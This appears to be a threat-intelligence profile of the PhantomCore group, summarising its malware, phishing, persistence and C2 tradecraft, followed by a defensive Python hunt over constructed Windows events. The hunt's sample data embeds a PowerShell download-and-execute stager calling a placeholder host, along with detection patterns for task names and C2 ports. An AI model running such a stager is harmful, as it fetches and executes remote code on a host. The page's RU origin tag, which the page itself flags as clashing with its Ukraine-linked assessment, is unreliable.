PhantomCore
PhantomCore is a suspected pro-Ukrainian, Ukraine-linked threat actor that multiple cited reports assess as operating in Ukrainian interests and targeting Russian and Belarusian organizations since 2022. Reporting describes the group as initially conducting cyber-espionage and later shifting at least part of its operations toward ransomware and destructive activity. It has been linked to attacks on Russian and Belarusian companies across sectors, and one report tied it to the compromise of 65 Microsoft Exchange servers in 26 countries, with roughly one-third of the victims appearing to be government systems.

Custom malware families attributed to PhantomCore include PhantomRAT, PhantomRShell, PhantomTaskShell, PhantomProxyLite, PhantomStealer, Phantom Control Panel, PhantomSscp, PhantomRemote (also written PhantomeRemote and tracked as PhantomCore.PollDL), and PhantomeCore.GreqBackdoor v2. Reporting also describes use of third-party and legitimate tools: MeshAgent and MeshCentral, RSocx, Rclone, OpenSSH, UPX, XenArmor All-In-One Password Recovery Pro, Impacket SMBExec, and, in at least one intrusion, LockBit 3.0.

Observed initial-access methods include spearphishing from compromised corporate email accounts; malicious ZIP, RAR, and LNK attachments disguised as documents; phishing links leading to fake CAPTCHA pages that deliver MeshAgent; exploitation of the WinRAR vulnerability CVE-2023-38831; exploitation of the TrueConf vulnerabilities BDU:2025-10114, BDU:2025-10115, and BDU:2025-10116 (FSTEC BDU identifiers, not CVEs); and compromise of Exchange login pages with injected keylogger code. The actor hosts payloads on compromised legitimate websites and on its own phishing domains.
Reported tradecraft includes PowerShell- and cmd-based execution; scheduled-task persistence under names such as Yandex Update, Microsoft Update, Update, SSH, SSHService, DNS, Yandex Task {user_sid}, and MicrosoftStatisticCore-related names; creation of services and local accounts; web shell deployment on TrueConf servers; DLL hijacking via libEGL.dll; anti-analysis checks in PhantomRAT; obfuscated and Base64-encoded PowerShell; disabling Microsoft Defender; clearing event logs; masquerading malware as legitimate Windows files; and deletion of tooling after operations.

Post-compromise activity includes host and network discovery with native Windows commands; credential theft from LSASS and NTDS.dit; theft of browser authentication data from Chrome and Yandex browsers via PhantomStealer and XenArmor; lateral movement over RDP, SMB, WinRM, and Impacket SMBExec; and command-and-control over HTTP, HTTPS, and SSH, including SSH tunneling over port 443 and use of nonstandard ports such as 81, 8000, and 8080.

Infrastructure described in the reporting includes phishing domains hosting fake CAPTCHAs, VPS servers mostly rented from Russian hosting providers, compromised legitimate servers, DynDNS services, domains impersonating services such as Mattermost and Nextcloud, and Mega.nz accounts used for exfiltration. The reporting also notes overlaps between PhantomCore and Bearlyfy, and one source refers to the group as "PhantomCore (Head Mare)".
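As an added example (not code from this page or from any of the cited vendors), the following Python hunt turns the tradecraft above into concrete rules and runs them over constructed sample events: the reported scheduled-task names (with the SID-bearing "Yandex Task {user_sid}" form matched by regex), decoding of Base64/UTF-16LE -EncodedCommand payloads in task actions, outbound connections to the reported nonstandard ports 81, 8000 and 8080, and ssh.exe connecting to 443. The JSON field names (modelled on Windows Security event 4698 and Sysmon event 3), the stager URL, and the SID are assumptions.

```python
"""Hunt logic for the PhantomCore persistence and C2 habits described above,
run over constructed sample events.

Added example for this page; it is not code from the original page or from
any of the cited vendors. Assumptions (not from the page): events are JSON
lines shaped like SIEM-normalized Windows Security event 4698 (scheduled task
created) and Sysmon event 3 (network connection); the field names and the
sample payload are hypothetical.
"""
import base64
import json
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Scheduled-task names reported for PhantomCore persistence (from the page).
# "Yandex Task {user_sid}" embeds a SID, so it is matched by regex instead.
REPORTED_TASK_NAMES = {"yandex update", "microsoft update", "update",
                       "ssh", "sshservice", "dns"}
TASK_NAME_PATTERNS = [
    re.compile(r"^yandex task s-1-5-21(-\d+){3}-\d+$"),
    re.compile(r"microsoftstatisticcore"),
]
# Nonstandard C2 ports from the reporting; 443 is flagged only for ssh.exe,
# since the page reports SSH tunneling over 443.
SUSPECT_PORTS = {81, 8000, 8080}
# powershell.exe accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_PREFIXES = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENC_FLAG = re.compile(rf"-(?:{_ENC_PREFIXES})\s+([A-Za-z0-9+/=]{{16,}})", re.I)


def task_name_matches(task_name: str) -> bool:
    """True if the task's leaf name is one of the reported persistence names."""
    leaf = task_name.rsplit("\\", 1)[-1].strip().lower()
    return leaf in REPORTED_TASK_NAMES or any(p.search(leaf) for p in TASK_NAME_PATTERNS)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a -EncodedCommand payload (Base64 of UTF-16LE), or None if absent."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def task_action(task_xml: str) -> str:
    """Return 'command arguments' from 4698 TaskContent XML, ignoring the namespace."""
    parts = []
    for el in ET.fromstring(task_xml).iter():
        if el.tag.rsplit("}", 1)[-1] in ("Command", "Arguments") and el.text:
            parts.append(el.text.strip())
    return " ".join(parts)


def analyze_event(event: dict) -> list[str]:
    """Apply the PhantomCore-derived rules to one event; return findings."""
    findings = []
    if event.get("EventID") == 4698:
        name = event.get("TaskName", "")
        if task_name_matches(name):
            findings.append(f"task name matches reported PhantomCore persistence: {name}")
        decoded = decode_encoded_command(task_action(event.get("TaskContent", "<Task/>")))
        if decoded is not None:
            findings.append(f"encoded PowerShell in task action: {decoded}")
    elif event.get("EventID") == 3:
        image, port = event.get("Image", "").lower(), int(event.get("DestinationPort", 0))
        if port in SUSPECT_PORTS:
            findings.append(f"outbound to nonstandard port {port} from {image}")
        if image.endswith("ssh.exe") and port == 443:
            findings.append(f"ssh.exe tunneling over 443: {image}")
    return findings


def scan(log_text: str) -> dict[int, list[str]]:
    """Map line index -> findings for every event line that triggers a rule."""
    hits = {}
    for i, line in enumerate(log_text.splitlines()):
        if line.strip():
            findings = analyze_event(json.loads(line))
            if findings:
                hits[i] = findings
    return hits


# Constructed sample data (hypothetical stager URL and SID, not from the page).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid:8080/u')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode()
TASK_XML = ('<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            "<Actions><Exec><Command>powershell.exe</Command>"
            f"<Arguments>-nop -w hidden -enc {ENCODED}</Arguments></Exec></Actions></Task>")
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 4698, "TaskName": "\\Yandex Update", "TaskContent": TASK_XML},
    {"EventID": 4698, "TaskName": "\\Yandex Task S-1-5-21-1111111111-2222222222-3333333333-1001",
     "TaskContent": "<Task><Actions><Exec><Command>C:\\Windows\\Temp\\svchost.exe"
                    "</Command></Exec></Actions></Task>"},
    {"EventID": 4698, "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": "<Task><Actions><Exec><Command>%windir%\\system32\\defrag.exe</Command>"
                    "<Arguments>-c -h -o -$</Arguments></Exec></Actions></Task>"},
    {"EventID": 3, "Image": "C:\\Windows\\Temp\\ssh.exe", "DestinationPort": 443},
    {"EventID": 3, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "DestinationPort": 443},
])

if __name__ == "__main__":
    for i, findings in scan(SAMPLE_LOG).items():
        print(f"event {i}: " + "; ".join(findings))
```

Running the block flags the "Yandex Update" task twice (name match plus the decoded stager), the SID-suffixed "Yandex Task" once, and the ssh.exe connection to 443, while the built-in defrag task and the browser's 443 traffic pass. Task names alone are a weak signal, since "Update", "SSH" and "DNS" are generic; in practice pair a name hit with the action check or with the creating process before raising an alert.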
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Where they're from
Attributed origin per open-source reporting.
- RU (as tagged on the page; note that the summary above assesses PhantomCore as Ukraine-linked and targeting Russian and Belarusian organizations)
Tradecraft
78 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
10 malware families attributed to this actor across reporting.
5 additional families tracked in Mallory.
Associated vulnerabilities
1 CVE this actor has used in observed campaigns (the WinRAR vulnerability CVE-2023-38831), which has been exploited in the wild. The TrueConf flaws cited in the summary carry BDU identifiers rather than CVEs, so they are not counted here.
Observables
24 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
14 sources tracked across advisories, community write-ups, and news.
- Group aligned with Ukrainian interests that attacks Russian and Belarusian companies and conducts APT-style campaigns emphasizing reconnaissance, persistence, and data exfiltration.
- Suspected pro-Ukrainian cluster targeting Russian companies across multiple sectors, using phishing with ZIP attachments to deliver PowerShell-based malware similar to PhantomRemote.
- Conducting phishing campaigns targeting Russian and Belarusian companies.
- Phishing and malicious email campaigns against Russian and Belarusian organizations delivering an LNK file that launches a multi-stage PowerShell loader/backdoor. It persists through the Task Scheduler and implements polling C2 (fetching commands and returning results).